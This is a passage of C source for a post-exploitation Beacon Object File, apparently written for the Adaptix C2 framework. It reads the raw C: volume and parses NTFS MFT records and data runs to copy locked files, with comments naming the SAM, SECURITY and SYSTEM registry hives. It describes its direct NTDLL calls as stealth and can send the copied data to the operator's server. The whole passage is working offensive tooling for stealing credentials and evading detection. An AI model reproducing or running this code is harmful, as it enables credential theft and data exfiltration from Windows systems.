BOOL CopyFileByExtentsToMemory(HANDLE hVolume, EXTENT* extents, DWORD extentCount, ULONGLONG clusterSize, ULONGLONG fileSize, BYTE** outputBuffer, ULONGLONG* outputSize) {
    ULONGLONG bytesCopied = 0;
    BYTE* readBuffer = NULL;
    DWORD bufferSize = 64 * 1024;
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;
    
    *outputBuffer = NULL;
    *outputSize = 0;
    
    if (fileSize > 0x7FFFFFFF) {
        return FALSE; // File too large
    }
    
    BYTE* tempBuffer = (BYTE*)intAlloc((SIZE_T)fileSize);
    if (!tempBuffer) {
        return FALSE;
    }
    
    readBuffer = (BYTE*)intAlloc(bufferSize);
    if (!readBuffer) {
        intFree(tempBuffer);
        return FALSE;
    }
    
    for (DWORD i = 0; i < extentCount; i++) {
        ULONGLONG extentBytes = extents[i].lengthClusters * clusterSize;
        ULONGLONG remaining = fileSize - bytesCopied;
        ULONGLONG toCopy = (extentBytes > remaining) ? remaining : extentBytes;
        
        if (toCopy == 0) break;
        
        // Check for sparse extent (LCN = -1)
        if (extents[i].lcn == (ULONGLONG)-1) {
            WriteSparseToMemory(tempBuffer, bytesCopied, toCopy);
            bytesCopied += toCopy;
            continue;
        }
        
        ULONGLONG diskOffset = extents[i].lcn * clusterSize;
        ULONGLONG copied = 0;
        
        if (!CopyChunkToMemory(hVolume, tempBuffer, bytesCopied, diskOffset, toCopy, readBuffer, bufferSize, &copied)) {
            if (bytesCopied >= fileSize) {
                break;
            }
            intFree(readBuffer);
            intFree(tempBuffer);
            return FALSE;
        }
        
        bytesCopied += copied;
        if (bytesCopied >= fileSize) break;
    }
    
    MSVCRT$memset(readBuffer, 0, bufferSize);
    intFree(readBuffer);
    
    if (bytesCopied != fileSize) {
        intFree(tempBuffer);
        return FALSE;
    }
    
    *outputBuffer = tempBuffer;
    *outputSize = bytesCopied;
    return TRUE;
}

// Helper function to read NTFS boot sector (stealth mode - no logging)
BOOL ReadNtfsBoot(HANDLE hVolume, NTFS_BOOT* boot) {
    BYTE buffer[512];
    IO_STATUS_BLOCK ioStatus;
    LARGE_INTEGER offset;
    NTSTATUS status;
    offset.QuadPart = 0;

    // Use direct NtReadFile for stealth
    status = NTDLL$NtReadFile(
        hVolume,
        NULL,
        NULL,
        NULL,
        &ioStatus,
        buffer,
        512,
        &offset,
        NULL
    );

    if (!NT_SUCCESS(status) || ioStatus.Information != 512) {
        return FALSE;
    }

    boot->bytesPerSector = *(WORD*)(buffer + BOOT_BYTES_PER_SECTOR);
    boot->sectorsPerCluster = buffer[BOOT_SECTORS_PER_CLUSTER];
    boot->clusterSize = boot->bytesPerSector * boot->sectorsPerCluster;
    boot->mftCluster = *(ULONGLONG*)(buffer + BOOT_MFT_CLUSTER);

    // Clear buffer from memory
    MSVCRT$memset(buffer, 0, sizeof(buffer));

    return TRUE;
}

// Get file information using GetFileInformationByHandle
BOOL GetNtfsFileInfo(LPCWSTR filePath, ULONGLONG* mftRecordNumber, ULONGLONG* fileSize) {
    HANDLE hFile = INVALID_HANDLE_VALUE;
    BY_HANDLE_FILE_INFORMATION fileInfo;
    WCHAR normalizedPath[MAX_PATH * 2];

    if (!NormalizePathForCreateFileW(filePath, normalizedPath, MAX_PATH * 2)) {
        return FALSE;
    }

    hFile = KERNEL32$CreateFileW(
        normalizedPath,
        FILE_READ_ATTRIBUTES,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_BACKUP_SEMANTICS,
        NULL
    );

    if (hFile == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    if (!KERNEL32$GetFileInformationByHandle(hFile, &fileInfo)) {
        KERNEL32$CloseHandle(hFile);
        return FALSE;
    }

    // Extract MFT record number from FileIndex
    ULONGLONG frn = ((ULONGLONG)fileInfo.nFileIndexHigh << 32) | fileInfo.nFileIndexLow;
    *mftRecordNumber = frn & 0x0000FFFFFFFFFFFF;
    *fileSize = ((ULONGLONG)fileInfo.nFileSizeHigh << 32) | fileInfo.nFileSizeLow;

    KERNEL32$CloseHandle(hFile);
    return TRUE;
}

// Read MFT record (using direct NtReadFile for stealth)
BOOL ReadMftRecord(HANDLE hVolume, NTFS_BOOT* boot, ULONGLONG recordNumber, BYTE* record) {
    ULONGLONG mftOffset = boot->mftCluster * boot->clusterSize;
    ULONGLONG recordOffset = mftOffset + (recordNumber * MFT_RECORD_SIZE);
    LARGE_INTEGER offset;
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;

    offset.QuadPart = recordOffset;

    // Use direct NtReadFile for stealth
    status = NTDLL$NtReadFile(
        hVolume,
        NULL,
        NULL,
        NULL,
        &ioStatus,
        record,
        MFT_RECORD_SIZE,
        &offset,
        NULL
    );

    if (!NT_SUCCESS(status) || ioStatus.Information != MFT_RECORD_SIZE) {
        return FALSE;
    }

    return TRUE;
}

// Parse data runs from $DATA attribute
int ParseDataRuns(BYTE* dataRuns, int dataRunsSize, DATA_RUN** runs, NTFS_BOOT* boot) {
    int pos = 0;
    ULONGLONG currentLCN = 0;
    int runCount = 0;
    DATA_RUN* runArray = NULL;
    int arraySize = 0;

    while (pos < dataRunsSize && dataRuns[pos] != 0x00) {
        BYTE header = dataRuns[pos++];
        BYTE lenSize = header & 0x0F;
        BYTE offSize = (header >> 4) & 0x0F;

        if (lenSize == 0 || lenSize > 8 || offSize > 8) {
            break;
        }

        // Read length
        ULONGLONG length = 0;
        int i;
        for (i = 0; i < lenSize; i++) {
            length |= ((ULONGLONG)dataRuns[pos++]) << (8 * i);
        }

        // Read offset (relative LCN)
        ULONGLONG offset = 0;
        BOOL isSparse = (offSize == 0);
        
        if (offSize > 0) {
            for (i = 0; i < offSize; i++) {
                offset |= ((ULONGLONG)dataRuns[pos++]) << (8 * i);
            }
            // Two's complement sign extension
            if (offSize < 8 && (dataRuns[pos - 1] & 0x80)) {
                ULONGLONG signExtend = ((ULONGLONG)0xFFFFFFFFFFFFFFFF) << (8 * offSize);
                offset |= signExtend;
            }
            currentLCN += offset;
        }
        // If offSize == 0, this is a sparse cluster - don't update currentLCN

        // Reallocate array if needed
        if (runCount >= arraySize) {
            arraySize = arraySize == 0 ? 16 : arraySize * 2;
            DATA_RUN* newArray = (DATA_RUN*)intAlloc(sizeof(DATA_RUN) * arraySize);
            if (runArray) {
                MSVCRT$memcpy(newArray, runArray, sizeof(DATA_RUN) * runCount);
                intFree(runArray);
            }
            runArray = newArray;
        }

        // For sparse clusters (offSize == 0), set LCN to 0 to mark as sparse
        runArray[runCount].lcn = isSparse ? 0 : currentLCN;
        runArray[runCount].length = length;
        runCount++;
    }

    *runs = runArray;
    return runCount;
}

// Get file info from MFT record
BOOL GetFileInfoFromRecord(BYTE* record, FILE_INFO* fileInfo, NTFS_BOOT* boot) {
    WORD attrOffset = *(WORD*)(record + 20);
    fileInfo->hasRuns = FALSE;
    fileInfo->isResident = FALSE;
    fileInfo->runs = NULL;
    fileInfo->runCount = 0;
    fileInfo->residentData = NULL;
    fileInfo->residentDataSize = 0;

    while (attrOffset < MFT_RECORD_SIZE) {
        DWORD attrType = *(DWORD*)(record + attrOffset);
        if (attrType == ATTRIBUTE_END) {
            break;
        }

        DWORD attrLength = *(DWORD*)(record + attrOffset + 4);
        if (attrLength == 0 || attrOffset + attrLength > MFT_RECORD_SIZE) {
            break;
        }

        BYTE nonResident = record[attrOffset + 8];

        // Handle $DATA attribute
        if (attrType == ATTRIBUTE_DATA) {
            if (nonResident == 0) {
                // Resident data
                fileInfo->isResident = TRUE;
                fileInfo->fileSize = *(ULONGLONG*)(record + attrOffset + 16);
                WORD valueOffset = *(WORD*)(record + attrOffset + 20);
                fileInfo->residentDataSize = (DWORD)fileInfo->fileSize;
                fileInfo->residentData = (BYTE*)intAlloc(fileInfo->residentDataSize);
                MSVCRT$memcpy(fileInfo->residentData, record + attrOffset + valueOffset, fileInfo->residentDataSize);
            } else {
                // Non-resident data
                fileInfo->isResident = FALSE;
                fileInfo->fileSize = *(ULONGLONG*)(record + attrOffset + 48);
                WORD dataRunsOffset = *(WORD*)(record + attrOffset + 32);
                int dataRunsSize = attrLength - dataRunsOffset;
                BYTE* dataRuns = record + attrOffset + dataRunsOffset;

                fileInfo->runCount = ParseDataRuns(dataRuns, dataRunsSize, &fileInfo->runs, boot);
                fileInfo->hasRuns = (fileInfo->runCount > 0);
            }
            break;
        }

        attrOffset += attrLength;
    }

    return TRUE;
}

// Copy file by extents (MFT mode) - stealth implementation
BOOL CopyFileByMft(HANDLE hVolume, HANDLE hOutput, FILE_INFO* fileInfo, NTFS_BOOT* boot) {
    ULONGLONG bytesWritten = 0;
    BYTE* buffer = NULL;
    DWORD bufferSize = 64 * 1024; // 64KB buffer for stealth (smaller = less memory footprint)
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;

    buffer = (BYTE*)intAlloc(bufferSize);
    if (!buffer) {
        return FALSE;
    }

    if (fileInfo->isResident) {
        // Copy resident data using NtWriteFile for stealth
        LARGE_INTEGER writeOffset;
        writeOffset.QuadPart = 0;
        status = NTDLL$NtWriteFile(
            hOutput,
            NULL,
            NULL,
            NULL,
            &ioStatus,
            fileInfo->residentData,
            fileInfo->residentDataSize,
            &writeOffset,
            NULL
        );
        if (!NT_SUCCESS(status)) {
            intFree(buffer);
            return FALSE;
        }
        bytesWritten = ioStatus.Information;
    } else if (fileInfo->hasRuns) {
        // Copy non-resident data
        int i;
        for (i = 0; i < fileInfo->runCount; i++) {
            ULONGLONG toRead = fileInfo->runs[i].length * boot->clusterSize;
            ULONGLONG remaining = fileInfo->fileSize - bytesWritten;
            if (toRead > remaining) {
                toRead = remaining;
            }
            if (toRead == 0) {
                break;
            }

            if (fileInfo->runs[i].lcn == 0) {
                // Sparse cluster - write zeros
                if (!WriteSparseToFile(hOutput, bytesWritten, toRead, buffer)) {
                    intFree(buffer);
                    return FALSE;
                }
                bytesWritten += toRead;
                continue;
            }

            ULONGLONG diskOffset = fileInfo->runs[i].lcn * boot->clusterSize;
            ULONGLONG copied = 0;
            
            if (!CopyChunkToFile(hVolume, hOutput, diskOffset, toRead, bytesWritten, buffer, bufferSize, &copied)) {
                // If we've copied some data and reached file size, it's OK
                if (bytesWritten >= fileInfo->fileSize) {
                    break;
                }
                intFree(buffer);
                return FALSE;
            }
            
            bytesWritten += copied;

            if (bytesWritten >= fileInfo->fileSize) {
                break;
            }
        }
    }

    // Clear buffer before freeing
    MSVCRT$memset(buffer, 0, bufferSize);
    intFree(buffer);
    
    // Verify that we copied the complete file
    if (bytesWritten != fileInfo->fileSize) {
        return FALSE;
    }
    
    return TRUE;
}

// Get file extents using FSCTL_GET_RETRIEVAL_POINTERS (Metadata mode)
int GetFileExtents(HANDLE hFile, EXTENT** extents, DWORD* extentCount) {
    DWORD bytesReturned = 0;
    DWORD bufferSize = 4096;
    BYTE* buffer = NULL;
    STARTING_VCN_INPUT_BUFFER inputBuffer = {0};
    PRETRIEVAL_POINTERS_BUFFER outputBuffer = NULL;
    EXTENT* extentArray = NULL;
    int result = 0;
    
    inputBuffer.StartingVcn.QuadPart = 0;
    
    // Allocate buffer for retrieval pointers
    buffer = (BYTE*)intAlloc(bufferSize);
    if (!buffer) {
        return 0;
    }
    
    // First call to get required buffer size
    if (!KERNEL32$DeviceIoControl(
        hFile,
        FSCTL_GET_RETRIEVAL_POINTERS,
        &inputBuffer,
        sizeof(inputBuffer),
        buffer,
        bufferSize,
        &bytesReturned,
        NULL
    )) {
        DWORD error = KERNEL32$GetLastError();
        if (error == ERROR_MORE_DATA) {
            // Need larger buffer
            intFree(buffer);
            bufferSize = bytesReturned;
            buffer = (BYTE*)intAlloc(bufferSize);
            if (!buffer) {
                return 0;
            }
            
            // Retry with larger buffer
            if (!KERNEL32$DeviceIoControl(
                hFile,
                FSCTL_GET_RETRIEVAL_POINTERS,
                &inputBuffer,
                sizeof(inputBuffer),
                buffer,
                bufferSize,
                &bytesReturned,
                NULL
            )) {
                intFree(buffer);
                return 0;
            }
        } else {
            intFree(buffer);
            return 0;
        }
    }
    
    outputBuffer = (PRETRIEVAL_POINTERS_BUFFER)buffer;
    
    // Allocate extent array
    extentArray = (EXTENT*)intAlloc(sizeof(EXTENT) * outputBuffer->ExtentCount);
    if (!extentArray) {
        intFree(buffer);
        return 0;
    }
    
    // Parse extents
    for (DWORD i = 0; i < outputBuffer->ExtentCount; i++) {
        LARGE_INTEGER nextVcn = outputBuffer->Extents[i].NextVcn;
        LARGE_INTEGER lcn = outputBuffer->Extents[i].Lcn;
        LARGE_INTEGER currentVcn = (i == 0) ? outputBuffer->StartingVcn : outputBuffer->Extents[i-1].NextVcn;
        
        extentArray[i].lcn = lcn.QuadPart;
        extentArray[i].lengthClusters = nextVcn.QuadPart - currentVcn.QuadPart;
    }
    
    *extents = extentArray;
    *extentCount = outputBuffer->ExtentCount;
    result = outputBuffer->ExtentCount;
    
    intFree(buffer);
    return result;
}

// Copy file by extents (Metadata mode) - stealth implementation
BOOL CopyFileByExtents(HANDLE hVolume, HANDLE hOutput, EXTENT* extents, DWORD extentCount, ULONGLONG clusterSize, ULONGLONG fileSize) {
    ULONGLONG bytesWritten = 0;
    BYTE* buffer = NULL;
    DWORD bufferSize = 64 * 1024; // 64KB buffer
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;
    
    buffer = (BYTE*)intAlloc(bufferSize);
    if (!buffer) {
        return FALSE;
    }
    
    for (DWORD i = 0; i < extentCount; i++) {
        ULONGLONG extentBytes = extents[i].lengthClusters * clusterSize;
        ULONGLONG remaining = fileSize - bytesWritten;
        ULONGLONG toCopy = (extentBytes > remaining) ? remaining : extentBytes;
        
        if (toCopy == 0) {
            break;
        }
        
        // Check for sparse extent (LCN = -1 indicates sparse cluster in FSCTL_GET_RETRIEVAL_POINTERS)
        // Note: LCN = 0 is a valid cluster (boot sector), so we only check for -1
        if (extents[i].lcn == (ULONGLONG)-1) {
            // Sparse extent - write zeros
            if (!WriteSparseToFile(hOutput, bytesWritten, toCopy, buffer)) {
                intFree(buffer);
                return FALSE;
            }
            bytesWritten += toCopy;
            continue;
        }
        
        ULONGLONG diskOffset = extents[i].lcn * clusterSize;
        ULONGLONG copied = 0;
        
        if (!CopyChunkToFile(hVolume, hOutput, diskOffset, toCopy, bytesWritten, buffer, bufferSize, &copied)) {
            // If we've copied some data and reached file size, it's OK
            if (bytesWritten >= fileSize) {
                break;
            }
            intFree(buffer);
            return FALSE;
        }
        
        bytesWritten += copied;
        
        if (bytesWritten >= fileSize) {
            break;
        }
    }
    
    // Clear buffer before freeing
    MSVCRT$memset(buffer, 0, bufferSize);
    intFree(buffer);
    
    // Verify that we copied the complete file
    if (bytesWritten != fileSize) {
        return FALSE;
    }
    
    return TRUE;
}

// Copy file by extents directly to memory buffer (for download to server)
BOOL CopyFileByMftToMemory(HANDLE hVolume, FILE_INFO* fileInfo, NTFS_BOOT* boot, BYTE** outputBuffer, ULONGLONG* outputSize) {
    ULONGLONG bytesCopied = 0;
    BYTE* buffer = NULL;
    DWORD bufferSize = 64 * 1024; // 64KB buffer
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;
    BYTE* resultBuffer = NULL;

    *outputBuffer = NULL;
    *outputSize = 0;

    // Allocate output buffer
    if (fileInfo->fileSize > 0x7FFFFFFF) {
        BeaconPrintf(CALLBACK_ERROR, "[-] File too large: %llu bytes\n", fileInfo->fileSize);
        return FALSE; // File too large
    }
    resultBuffer = (BYTE*)intAlloc((SIZE_T)fileInfo->fileSize);
    if (!resultBuffer) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate buffer for file (%llu bytes)\n", fileInfo->fileSize);
        return FALSE;
    }

    buffer = (BYTE*)intAlloc(bufferSize);
    if (!buffer) {
        intFree(resultBuffer);
        return FALSE;
    }

    if (fileInfo->isResident) {
        // Copy resident data directly
        if (fileInfo->residentData && fileInfo->residentDataSize > 0) {
            MSVCRT$memcpy(resultBuffer, fileInfo->residentData, fileInfo->residentDataSize);
            bytesCopied = fileInfo->residentDataSize;
        } else {
            intFree(resultBuffer);
            intFree(buffer);
            return FALSE;
        }
    } else if (fileInfo->hasRuns && fileInfo->runCount > 0) {
        // Copy non-resident data
        int i;
        for (i = 0; i < fileInfo->runCount; i++) {
            ULONGLONG toRead = fileInfo->runs[i].length * boot->clusterSize;
            ULONGLONG remaining = fileInfo->fileSize - bytesCopied;
            if (toRead > remaining) {
                toRead = remaining;
            }
            if (toRead == 0) {
                break;
            }

            if (fileInfo->runs[i].lcn == 0) {
                // Sparse cluster - write zeros
                WriteSparseToMemory(resultBuffer, bytesCopied, toRead);
                bytesCopied += toRead;
                continue;
            }

            ULONGLONG diskOffset = fileInfo->runs[i].lcn * boot->clusterSize;
            ULONGLONG copied = 0;
            
            if (!CopyChunkToMemory(hVolume, resultBuffer, bytesCopied, diskOffset, toRead, buffer, bufferSize, &copied)) {
                // If we've copied some data and reached file size, it's OK
                if (bytesCopied >= fileInfo->fileSize) {
                    break;
                }
                intFree(resultBuffer);
                intFree(buffer);
                return FALSE;
            }
            
            bytesCopied += copied;

            if (bytesCopied >= fileInfo->fileSize) {
                break;
            }
        }
    } else {
        // File has no data runs and is not resident - empty file or error
        if (fileInfo->fileSize == 0) {
            // Empty file is valid
            bytesCopied = 0;
        } else {
            // Error: file has size but no data
            BeaconPrintf(CALLBACK_ERROR, "[-] File has size (%llu) but no data (not resident, no runs)\n", fileInfo->fileSize);
            intFree(resultBuffer);
            intFree(buffer);
            return FALSE;
        }
    }

    // Clear buffer before freeing
    MSVCRT$memset(buffer, 0, bufferSize);
    intFree(buffer);

    // Verify that we copied the complete file
    if (bytesCopied != fileInfo->fileSize) {
        intFree(resultBuffer);
        return FALSE;
    }
    
    *outputBuffer = resultBuffer;
    *outputSize = bytesCopied;
    return TRUE;
}

// Download file to server using Adaptix API
BOOL download_file(IN LPCSTR sourcePath, IN LPCSTR customFileName, IN char* fileData, IN ULONG32 fileLength) {
    if (!fileData || fileLength == 0) {
        return FALSE;
    }

    // Use source path for display name
    LPCSTR pathToResolve = sourcePath;
    if (customFileName && MSVCRT$strlen(customFileName) > 0) {
        pathToResolve = customFileName;
    }
    if (!pathToResolve || MSVCRT$strlen(pathToResolve) == 0) {
        return FALSE;
    }

    // Convert path to wide for GetFullPathNameW
    int pathLen = MSVCRT$strlen(pathToResolve) + 1;
    int wideLen = KERNEL32$MultiByteToWideChar(CP_ACP, 0, pathToResolve, pathLen, NULL, 0);
    if (wideLen <= 0) {
        return FALSE;
    }
    WCHAR* pathW = (WCHAR*)intAlloc(wideLen * sizeof(WCHAR));
    if (!pathW) {
        return FALSE;
    }
    KERNEL32$MultiByteToWideChar(CP_ACP, 0, pathToResolve, pathLen, pathW, wideLen);

    // Resolve to full path
    WCHAR fullPathW[MAX_PATH];
    DWORD fullLen = KERNEL32$GetFullPathNameW(pathW, MAX_PATH, fullPathW, NULL);
    intFree(pathW);

    char* finalFileName = NULL;
    if (fullLen > 0 && fullLen < MAX_PATH) {
        // Convert full path back to ANSI for AxDownloadMemory
        int ansiLen = KERNEL32$WideCharToMultiByte(CP_ACP, 0, fullPathW, (int)(fullLen + 1), NULL, 0, NULL, NULL);
        if (ansiLen > 0) {
            finalFileName = (char*)intAlloc(ansiLen);
            if (finalFileName) {
                KERNEL32$WideCharToMultiByte(CP_ACP, 0, fullPathW, (int)(fullLen + 1), finalFileName, ansiLen, NULL, NULL);
            }
        }
    }
    if (!finalFileName) {
        // Fallback: use original path as-is
        int pathSize = MSVCRT$strlen(pathToResolve) + 1;
        finalFileName = (char*)intAlloc(pathSize);
        if (!finalFileName) {
            return FALSE;
        }
        MSVCRT$strcpy(finalFileName, pathToResolve);
    }

    // Download to server
    AxDownloadMemory(finalFileName, fileData, (int)fileLength);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] File downloaded to server: %s (%lu bytes)\n", finalFileName, fileLength);

    intFree(finalFileName);
    return TRUE;
}

// Main function
void go(char* args, int len) {
    datap parser;
    char* mode = NULL;
    char* sourceFile = NULL;
    char* destFile = NULL;
    int downloadToServer = 0;  // 0 = write to disk, 1 = download to server
    WCHAR* sourceFileW = NULL;
    WCHAR* destFileW = NULL;
    HANDLE hVolume = INVALID_HANDLE_VALUE;
    HANDLE hOutput = INVALID_HANDLE_VALUE;
    NTFS_BOOT boot = {0};
    FILE_INFO fileInfo = {0};
    BYTE* mftRecord = NULL;
    ULONGLONG mftRecordNumber = 0;
    ULONGLONG fileSize = 0;
    BOOL success = FALSE;
    BYTE* fileBuffer = NULL;  // Buffer for file data when downloading to server

    BeaconDataParse(&parser, args, len);
    mode = BeaconDataExtract(&parser, NULL);
    sourceFile = BeaconDataExtract(&parser, NULL);
    destFile = BeaconDataExtract(&parser, NULL);
    downloadToServer = BeaconDataInt(&parser);

    if (!mode || !sourceFile) {
        return;
    }

    // Check if destFile is empty string (when --download is used without destination)
    if (destFile && MSVCRT$strlen(destFile) == 0) {
        destFile = NULL;
    }

    // If downloading to server, destFile is optional (used as filename on server)
    // If saving to disk, destFile is required
    if (!downloadToServer && !destFile) {
        return;
    }

    // Convert to wide char
    int sourceLen = MSVCRT$strlen(sourceFile) + 1;
    sourceFileW = (WCHAR*)intAlloc(sourceLen * sizeof(WCHAR));
    KERNEL32$MultiByteToWideChar(CP_ACP, 0, sourceFile, -1, sourceFileW, sourceLen);

    if (destFile) {
        int destLen = MSVCRT$strlen(destFile) + 1;
        destFileW = (WCHAR*)intAlloc(destLen * sizeof(WCHAR));
        KERNEL32$MultiByteToWideChar(CP_ACP, 0, destFile, -1, destFileW, destLen);
    } else if (downloadToServer) {
        // Generate default filename from source if not provided
        char* fileName = MSVCRT$strrchr(sourceFile, '\\');
        if (!fileName) {
            fileName = MSVCRT$strrchr(sourceFile, '/');
        }
        if (fileName) {
            fileName++;  // Skip the separator
        } else {
            fileName = sourceFile;
        }
        int destLen = MSVCRT$strlen(fileName) + 1;
        destFileW = (WCHAR*)intAlloc(destLen * sizeof(WCHAR));
        KERNEL32$MultiByteToWideChar(CP_ACP, 0, fileName, -1, destFileW, destLen);
    }

    // Open volume using NtCreateFile for stealth (hardcoded to C: for now)
    OBJECT_ATTRIBUTES objAttr;
    UNICODE_STRING volumePath;
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;

    WCHAR volumeName[] = L"\\??\\C:";
    NTDLL$RtlInitUnicodeString(&volumePath, volumeName);

    objAttr.Length = sizeof(OBJECT_ATTRIBUTES);
    objAttr.RootDirectory = NULL;
    objAttr.ObjectName = &volumePath;
    objAttr.Attributes = OBJ_CASE_INSENSITIVE;
    objAttr.SecurityDescriptor = NULL;
    objAttr.SecurityQualityOfService = NULL;

    status = NTDLL$NtCreateFile(
        &hVolume,
        FILE_READ_DATA | SYNCHRONIZE,
        &objAttr,
        &ioStatus,
        NULL,
        FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT,
        NULL,
        0
    );

    if (!NT_SUCCESS(status)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open volume: 0x%08X\n", status);
        goto cleanup;
    }

    // Read NTFS boot sector
    if (!ReadNtfsBoot(hVolume, &boot)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read NTFS boot sector\n");
        goto cleanup;
    }

    if (MSVCRT$strcmp(mode, "MFT") == 0) {
        // MFT mode
        if (!GetNtfsFileInfo(sourceFileW, &mftRecordNumber, &fileSize)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get file info from source\n");
            goto cleanup;
        }

        mftRecord = (BYTE*)intAlloc(MFT_RECORD_SIZE);
        if (!mftRecord) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate MFT record buffer\n");
            goto cleanup;
        }

        if (!ReadMftRecord(hVolume, &boot, mftRecordNumber, mftRecord)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read MFT record\n");
            goto cleanup;
        }

        // Initialize fileSize before parsing (will be overwritten if $DATA found)
        fileInfo.fileSize = fileSize;

        if (!GetFileInfoFromRecord(mftRecord, &fileInfo, &boot)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse file info from MFT record\n");
            goto cleanup;
        }

        // Use actual file size from GetNtfsFileInfo (more reliable)
        fileInfo.fileSize = fileSize;

        if (downloadToServer) {
            // Copy file directly to memory for download (no disk write)
            ULONGLONG copiedSize = 0;
            if (!CopyFileByMftToMemory(hVolume, &fileInfo, &boot, &fileBuffer, &copiedSize)) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy file data to memory\n");
                goto cleanup;
            }

            // Close output file handle (we don't need it anymore)
            if (hOutput != INVALID_HANDLE_VALUE) {
                NTDLL$NtClose(hOutput);
                hOutput = INVALID_HANDLE_VALUE;
            }

            // Download to server
            if (download_file(sourceFile, destFile, (char*)fileBuffer, (ULONG32)copiedSize)) {
                success = TRUE;
                BeaconPrintf(CALLBACK_OUTPUT, "[+] File copied and downloaded to server: %llu bytes\n", copiedSize);
            } else {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to download file to server\n");
            }
        } else {
            // Create output file using NtCreateFile for stealth
            if (!CreateOutputFileNt(destFileW, &hOutput)) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create output file\n");
                goto cleanup;
            }

            if (!CopyFileByMft(hVolume, hOutput, &fileInfo, &boot)) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy file data\n");
                goto cleanup;
            }

            success = TRUE;
            BeaconPrintf(CALLBACK_OUTPUT, "[+] File copied successfully: %llu bytes\n", fileSize);
        }
    } else if (MSVCRT$strcmp(mode, "Metadata") == 0) {
        // Metadata mode - use FSCTL_GET_RETRIEVAL_POINTERS
        HANDLE hSourceFile = INVALID_HANDLE_VALUE;
        EXTENT* extents = NULL;
        DWORD extentCount = 0;

        // Get file size
        if (!GetNtfsFileInfo(sourceFileW, &mftRecordNumber, &fileSize)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get file info from source\n");
            goto cleanup;
        }

        // Open source file for getting extents using CreateFileW (DeviceIoControl requires CreateFileW handle)
        WCHAR normalizedSourcePath[MAX_PATH * 2];

        if (!NormalizePathForCreateFileW(sourceFileW, normalizedSourcePath, MAX_PATH * 2)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to normalize source path\n");
            goto cleanup;
        }

        // Try with minimal access rights first (FSCTL_GET_RETRIEVAL_POINTERS may work with just FILE_READ_ATTRIBUTES)
        // For locked files like SAM, SECURITY, SYSTEM, we need FILE_FLAG_BACKUP_SEMANTICS
        hSourceFile = KERNEL32$CreateFileW(
            normalizedSourcePath,
            FILE_READ_ATTRIBUTES,
            FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
            NULL,
            OPEN_EXISTING,
            FILE_FLAG_BACKUP_SEMANTICS,
            NULL
        );

        // If that fails, try with FILE_READ_DATA (but this usually fails for locked files)
        if (hSourceFile == INVALID_HANDLE_VALUE) {
            DWORD error1 = KERNEL32$GetLastError();
            hSourceFile = KERNEL32$CreateFileW(
                normalizedSourcePath,
                FILE_READ_ATTRIBUTES | FILE_READ_DATA,
                FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                NULL,
                OPEN_EXISTING,
                FILE_FLAG_BACKUP_SEMANTICS,
                NULL
            );
            if (hSourceFile == INVALID_HANDLE_VALUE) {
                // Both attempts failed - file is likely locked
                DWORD error2 = KERNEL32$GetLastError();
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open source file (locked?): first=0x%08X, second=0x%08X\n", error1, error2);
                BeaconPrintf(CALLBACK_ERROR, "[-] Note: For locked files (SAM, SECURITY, SYSTEM), use MFT mode instead\n");
                goto cleanup;
            }
        }

        if (hSourceFile == INVALID_HANDLE_VALUE) {
            DWORD error = KERNEL32$GetLastError();
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open source file: 0x%08X\n", error);
            goto cleanup;
        }

        // Get extents
        if (GetFileExtents(hSourceFile, &extents, &extentCount) == 0) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get file extents\n");
            KERNEL32$CloseHandle(hSourceFile);
            goto cleanup;
        }

        KERNEL32$CloseHandle(hSourceFile);

        if (downloadToServer) {
            // Copy file directly to memory for download
            ULONGLONG copiedSize = 0;
            BYTE* tempBuffer = NULL;

            if (!CopyFileByExtentsToMemory(hVolume, extents, extentCount, boot.clusterSize, fileSize, &tempBuffer, &copiedSize)) {
                intFree(extents);
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy file data to memory\n");
                goto cleanup;
            }

            // Download to server
            if (download_file(sourceFile, destFile, (char*)tempBuffer, (ULONG32)copiedSize)) {
                success = TRUE;
                BeaconPrintf(CALLBACK_OUTPUT, "[+] File copied and downloaded to server: %llu bytes\n", copiedSize);
            } else {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to download file to server\n");
            }

            intFree(tempBuffer);
        } else {
            // Create output file using NtCreateFile for stealth
            if (!CreateOutputFileNt(destFileW, &hOutput)) {
                intFree(extents);
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create output file\n");
                goto cleanup;
            }

            if (!CopyFileByExtents(hVolume, hOutput, extents, extentCount, boot.clusterSize, fileSize)) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to copy file data\n");
                intFree(extents);
                goto cleanup;
            }

            success = TRUE;
            BeaconPrintf(CALLBACK_OUTPUT, "[+] File copied successfully: %llu bytes\n", fileSize);
        }

        if (extents) {
            intFree(extents);
        }
    }

cleanup:
